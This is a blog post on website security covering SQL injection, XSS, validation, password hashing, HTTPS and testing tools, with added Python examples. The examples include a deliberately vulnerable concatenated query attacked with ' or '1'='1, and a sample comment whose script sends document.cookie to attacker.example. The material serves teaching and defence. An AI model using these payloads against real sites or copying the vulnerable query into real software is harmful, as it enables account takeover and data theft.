Sunday, 6 January 2019

How to secure website


01. Keep the software updated

This may seem obvious, but ensuring you keep all software up to date is vital in keeping your site secure. This applies both to the server operating system and to any software you are running on your website, such as a CMS or forum. When security holes are found in software, hackers are quick to attempt to abuse them.

If you are using a managed hosting solution then you don't need to worry so much about applying security updates for the operating system, as the hosting company should take care of this.

If you are using third-party software on your website, such as a CMS or forum, you should ensure you are quick to apply any security patches. Most vendors have a mailing list or RSS feed detailing any website security issues. WordPress, Umbraco and many other CMSes notify you of available system updates when you log in.

Many developers use tools such as Composer, npm or RubyGems to manage their software dependencies, and a security vulnerability appearing in a package you depend on but aren't paying any attention to is one of the easiest ways to get caught out. Ensure you keep your dependencies up to date, and use a tool such as Gemnasium (or the audit command built into your package manager) to get automatic notifications when a vulnerability is announced in one of your components.

02. Watch out for SQL injection

SQL injection attacks occur when an attacker uses a web form field or URL parameter to gain access to or manipulate your database. When you use standard Transact SQL it is easy to unknowingly insert rogue code into your query that could be used to change tables, get information and delete data. You can easily prevent this by always using parameterised queries; most web languages have this feature and it is easy to implement.

Consider a query that is built by concatenating a URL parameter straight into the SQL string. If an attacker changes the URL parameter to pass in ' or '1'='1, the condition '1'='1' is always true, so the WHERE clause matches every row, and the attacker can also append a further statement to the end of the query, which would be executed as well.

You can fix this by explicitly parameterising the query. For example, if you are using MySQL in PHP, the parameter should be bound to a placeholder in a prepared statement rather than concatenated into the query text.
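The vulnerable query and its parameterised form side by side, as an added example that is not part of the original article. It uses Python's built-in sqlite3 module and a small constructed users table (both assumptions, standing in for the PHP/MySQL the text refers to); the attacker's input is the same ' or '1'='1 payload described above.

```python
import sqlite3

# Constructed sample data for the demonstration, not data from the article.
SAMPLE_USERS = [
    ("alice", "alice@example.com"),
    ("bob", "bob@example.com"),
]


def make_db():
    """Create an in-memory database holding the sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def find_user_vulnerable(conn, username):
    """Look up a user by building the SQL through string concatenation.

    This is the mistake the article warns about: the attacker's input
    becomes part of the SQL text, so a value such as  ' or '1'='1
    turns the WHERE clause into  username = '' or '1'='1'  and the
    query returns every row in the table.
    """
    sql = "SELECT username, email FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn, username):
    """Look up a user with a parameterised query.

    The ? placeholder is bound by the database driver; the input is only
    ever treated as a value to compare against and can never change the
    structure of the statement, so the same payload matches nothing.
    """
    sql = "SELECT username, email FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "' or '1'='1"
    print("vulnerable:", find_user_vulnerable(db, payload))  # both rows leak
    print("safe:      ", find_user_safe(db, payload))        # []
```

The safe version is the one to use everywhere user input reaches a query; the concatenated form is shown only so you can see the payload in action against your own test database.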

03. Protect against XSS attacks

Cross-site scripting (XSS) attacks inject malicious JavaScript into your pages, which then runs in the browsers of your users and can change page content or steal information to send back to the attacker. For example, if you show comments on a page without validation, an attacker might submit comments containing script tags and JavaScript, which could run in every other user's browser and steal their login cookie, allowing the attacker to take control of the account of every user who viewed the comment. You need to ensure that users cannot inject active JavaScript content into your pages.

This is a particular concern in modern web applications, where pages are now built primarily from user content, and which in many cases generate HTML that is then also interpreted by front-end frameworks such as Angular and Ember. These frameworks provide many XSS protections, but mixing server and client rendering creates new and more complicated attack avenues too: not only is injecting JavaScript into the HTML effective, but you can also inject content that will run code by inserting Angular directives or using Ember helpers.

The key here is to focus on how your user-generated content could escape the bounds you expect and be interpreted by the browser as something other than what you intended. This is similar to defending against SQL injection. When dynamically generating HTML, use functions that explicitly make the change you are looking for (for example element.setAttribute and element.textContent, which the browser escapes automatically, rather than setting element.innerHTML by hand), or use functions in your templating tool that automatically do the appropriate escaping, rather than concatenating strings or setting raw HTML content.

Another powerful tool in the XSS defender's toolbox is Content Security Policy (CSP). CSP is a header your server can return which tells the browser to limit how and what JavaScript is executed in the page, for example to disallow running any scripts not hosted on your domain, disallow inline JavaScript, or disable eval(). Mozilla has an excellent guide with some example configurations. This makes it much harder for an attacker's scripts to work, even if they can get them into your page.
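The two defences in this section, output escaping and a CSP header, as an added example that is not part of the original article. It is server-side Python (an assumption; the article does not prescribe a language) rendering a comment list: the unsafe and the escaped renderer are shown together, the sample comments are constructed, and the policy string is one restrictive example of the kind Mozilla's guide describes, not a recommended setting for every site.

```python
import html
import re

# Constructed sample comments, not data from the article. The second one is
# the payload the text describes: script tags submitted in a user comment.
SAMPLE_COMMENTS = [
    "Great post, thanks!",
    '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
    'Nice "quotes" & <b>bold</b>',
]

WRAP_OPEN, WRAP_CLOSE = '<li class="comment">', "</li>"


def render_comment_unsafe(comment):
    """Raw concatenation: the browser parses the attacker's <script> tag
    and runs it in every reader's session."""
    return WRAP_OPEN + comment + WRAP_CLOSE


def render_comment_safe(comment):
    """html.escape turns <, >, &, " and ' into entities, so the browser
    displays the comment as text and never sees a tag to execute."""
    return WRAP_OPEN + html.escape(comment, quote=True) + WRAP_CLOSE


TAG_RE = re.compile(r"<[A-Za-z/]")


def contains_markup(rendered_comment):
    """True if anything the browser would parse as a tag survived inside
    our own <li> wrapper, i.e. the user content escaped its bounds."""
    inner = rendered_comment[len(WRAP_OPEN):-len(WRAP_CLOSE)]
    return TAG_RE.search(inner) is not None


def content_security_policy():
    """Build a restrictive CSP: scripts only from the site's own origin,
    and because 'unsafe-inline' and 'unsafe-eval' are absent, inline
    scripts and eval() are blocked. Send it as the
    Content-Security-Policy response header."""
    return "; ".join([
        "default-src 'self'",
        "script-src 'self'",
        "object-src 'none'",
        "base-uri 'self'",
    ])


if __name__ == "__main__":
    for c in SAMPLE_COMMENTS:
        print(render_comment_safe(c))
    print("Content-Security-Policy:", content_security_policy())
```

Escaping at output time is what prevents the injection; the CSP is a second layer that limits what an attacker's script could do if some path still lets markup through.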

04. Beware of error messages

Be careful with how much information you give away in your error messages. Provide only minimal errors to your users, to ensure they don't leak secrets present on your server (such as API keys or database passwords). Don't provide full exception details either, as these can make complex attacks like SQL injection far easier. Keep detailed errors in your server logs, and show users only the information they need.

05. Validate on both sides

Validation should always be done both on the browser and on the server side. The browser can catch simple failures such as mandatory fields that are empty, or text entered into a numbers-only field. However, these checks can be bypassed, so you must make sure you repeat them, and perform deeper validation, on the server side, as failing to do so could lead to malicious code or scripting code being inserted into the database or causing undesirable results in your website.
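A server-side validator of the kind this step calls for, as an added example that is not part of the original article. It is Python (an assumption) and checks a hypothetical registration form with username, email and age fields; the field names, limits and the constructed submissions are all illustrative. Whatever the browser enforced, the server re-checks every field and applies the stricter rules.

```python
import re

USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{3,32}$")
# Deliberately simple address check: one @, no whitespace, a dot in the domain.
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")

MIN_AGE, MAX_AGE = 13, 120


def validate_registration(form):
    """Validate submitted POST fields on the server.

    `form` is a dict of field name -> submitted string. Returns a dict of
    field -> error message; an empty dict means the submission is valid.
    Nothing stops a client from posting arbitrary values directly, so
    every check the browser might have done is repeated here.
    """
    errors = {}
    username = form.get("username", "")
    email = form.get("email", "")
    age = form.get("age", "")

    # Required field, then a whitelist of allowed characters: a username
    # such as <script>alert(1)</script> is rejected outright rather than
    # relying on escaping later.
    if not isinstance(username, str) or not username.strip():
        errors["username"] = "required"
    elif not USERNAME_RE.match(username):
        errors["username"] = "3-32 letters, digits or underscores only"

    if not isinstance(email, str) or not email.strip():
        errors["email"] = "required"
    elif len(email) > 254 or not EMAIL_RE.match(email):
        errors["email"] = "not a valid address"

    # Numeric field: must be a whole number (so "-1" and "12abc" fail)
    # and within a sensible range.
    if not isinstance(age, str) or not age.isdigit():
        errors["age"] = "must be a whole number"
    elif not MIN_AGE <= int(age) <= MAX_AGE:
        errors["age"] = "out of range"

    return errors


if __name__ == "__main__":
    # Constructed submissions: one honest, one hostile.
    print(validate_registration({"username": "alice_01",
                                 "email": "alice@example.com", "age": "34"}))
    print(validate_registration({"username": "<script>alert(1)</script>",
                                 "email": "not-an-email", "age": "-1"}))
```

Validated input still needs escaping when it is rendered; the two controls address different problems and both are required.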

06. Check your passwords

Everyone knows they should use complex passwords, but that doesn't mean they always do.

Enforcing password requirements such as a minimum of eight characters, including an uppercase letter and a number, will help to protect your users' accounts.

Passwords should never be stored in plain text; store them as hashed values produced by a one-way hashing algorithm. A slow, purpose-built password hash such as bcrypt, scrypt or Argon2 is a better choice than a fast general-purpose hash such as SHA, because it makes every guess expensive for an attacker. Using this method means that when you authenticate users you only ever compare hashed values. For extra security it is a good idea to salt the passwords, using a new salt per password.

In the event of someone hacking in and stealing your passwords, using hashed passwords limits the damage, as reversing them is not possible. The best an attacker can do is a dictionary or brute-force attack, essentially guessing every combination until a match is found. When using salted passwords, cracking a large number of passwords is slower still, as every guess has to be hashed separately for every salt + password combination, which is computationally very expensive.

Thankfully, many CMSes provide user management out of the box with a lot of these website security features built in, although some configuration or extra modules might be required to use salted passwords (pre-Drupal 7) or to set the minimum password strength. If you are using .NET then it is worth using membership providers, as they are very configurable, provide inbuilt website security and include ready-made controls for login and password reset.
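The password policy check and salted, one-way password storage described in this section, as an added example that is not part of the original article. It is Python using the standard library's hashlib.scrypt (the choice of scrypt, its work factors and the stored-string format are assumptions); every password gets a fresh random salt, and verification recomputes the hash from the stored parameters and compares in constant time.

```python
import hashlib
import hmac
import os
import re

# scrypt work factors (assumed values): n=2**14, r=8 needs 16 MiB per hash,
# which is what makes each attacker guess expensive.
SCRYPT_N, SCRYPT_R, SCRYPT_P = 2 ** 14, 8, 1
SALT_BYTES = 16
DKLEN = 32


def meets_policy(password):
    """The minimum rules the text suggests: at least eight characters,
    including an uppercase letter and a digit."""
    return (len(password) >= 8
            and re.search(r"[A-Z]", password) is not None
            and re.search(r"[0-9]", password) is not None)


def hash_password(password, salt=None):
    """Return a self-describing record: scrypt$n$r$p$salt_hex$hash_hex.

    A fresh random salt is generated per password, so two users with the
    same password get different stored values and an attacker cannot
    crack them all with one precomputed table.
    """
    if salt is None:
        salt = os.urandom(SALT_BYTES)
    digest = hashlib.scrypt(password.encode("utf-8"), salt=salt,
                            n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=DKLEN)
    return "scrypt$%d$%d$%d$%s$%s" % (SCRYPT_N, SCRYPT_R, SCRYPT_P,
                                      salt.hex(), digest.hex())


def verify_password(password, stored):
    """Re-run the hash with the stored salt and parameters, then compare
    in constant time so the comparison leaks nothing about the digest."""
    parts = stored.split("$")
    if len(parts) != 6 or parts[0] != "scrypt":
        return False
    _, n, r, p, salt_hex, hash_hex = parts
    digest = hashlib.scrypt(password.encode("utf-8"),
                            salt=bytes.fromhex(salt_hex),
                            n=int(n), r=int(r), p=int(p), dklen=DKLEN)
    return hmac.compare_digest(digest.hex(), hash_hex)


if __name__ == "__main__":
    pw = "Tr0ub4dor&3"          # constructed sample password
    print("policy ok:", meets_policy(pw))
    record = hash_password(pw)
    print("stored:", record)
    print("verify correct:", verify_password(pw, record))
    print("verify wrong:  ", verify_password("password", record))
```

Storing the parameters alongside the hash lets you raise the work factors later and re-hash users on their next successful login without invalidating existing records.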

07. Use HTTPS

HTTPS is a protocol used to provide security over the Internet. HTTPS guarantees that users are talking to the server they expect, and that nobody else can intercept or change the content they are seeing in transit.

If you have anything that your users might want private, it is highly advisable to use only HTTPS to deliver it. That of course means credit card and login pages (and the URLs they submit to), but typically far more of your site too. A login form will often set a cookie, for example, which is sent with every other request to your site that a logged-in user makes, and is used to authenticate those requests. An attacker stealing this would be able to perfectly imitate a user and take over their login session. To defeat these kinds of attacks, you almost always want to use HTTPS for your entire site.

That is no longer as tricky or expensive as it once was. Let's Encrypt provides totally free and automated certificates, which you will need to enable HTTPS, and there are existing community tools available for a wide range of common platforms and frameworks to set this up for you automatically.

Notably, Google has announced that it will boost you up in the search rankings if you use HTTPS, giving this an SEO benefit too. Insecure HTTP is on its way out, and now is the time to upgrade.

Already using HTTPS everywhere? Go further and look at setting up HTTP Strict Transport Security (HSTS), an easy header you can add to your server responses to disallow insecure HTTP for your entire domain.

08. Get website security tools
Once you think you have done all you can, it is time to test your website security. The most effective way of doing this is via the use of some website security tools, often referred to as penetration testing or pen testing for short.

There are many commercial and free products to assist you with this. They work on a similar basis to the scripts hackers use, in that they test all known exploits and attempt to compromise your site using some of the methods mentioned previously, such as SQL injection.

Some free tools that are worth looking at:

Netsparker (free community edition and trial version available). Good for testing SQL injection and XSS.
OpenVAS claims to be the most advanced open source security scanner. Good for testing known vulnerabilities, currently scanning over 25,000. But it can be difficult to set up and requires an OpenVAS server to be installed, which only runs on *nix. OpenVAS is a fork of Nessus from before it became a closed-source commercial product.
SecurityHeaders.io (free online check). A tool to quickly report which of the security headers mentioned above (such as CSP and HSTS) a domain has enabled and correctly configured.
Xenotix XSS Exploit Framework is a tool from OWASP (Open Web Application Security Project) that includes a huge selection of XSS attack examples, which you can run to quickly confirm whether your site's inputs are vulnerable in Chrome, Firefox and IE.
The results from automated tests can be daunting, as they present a wealth of potential issues. The important thing is to focus on the critical issues first. Each issue reported normally comes with a good explanation of the potential vulnerability. You will probably find that some of the medium/low issues are not a concern for your site.

There are some further steps you can take to manually try to compromise your site by altering POST/GET values. A debugging proxy can assist you here, as it allows you to intercept the values of an HTTP request between your browser and the server. A popular freeware application called Fiddler is a good starting point.

So what should you be trying to alter on the request? If you have pages which should only be visible to a logged-in user, try changing URL parameters such as user IDs, or cookie values, in an attempt to view the details of another user. Another area worth testing is forms: change the POST values to attempt to submit code to perform XSS, or to upload a server-side script.

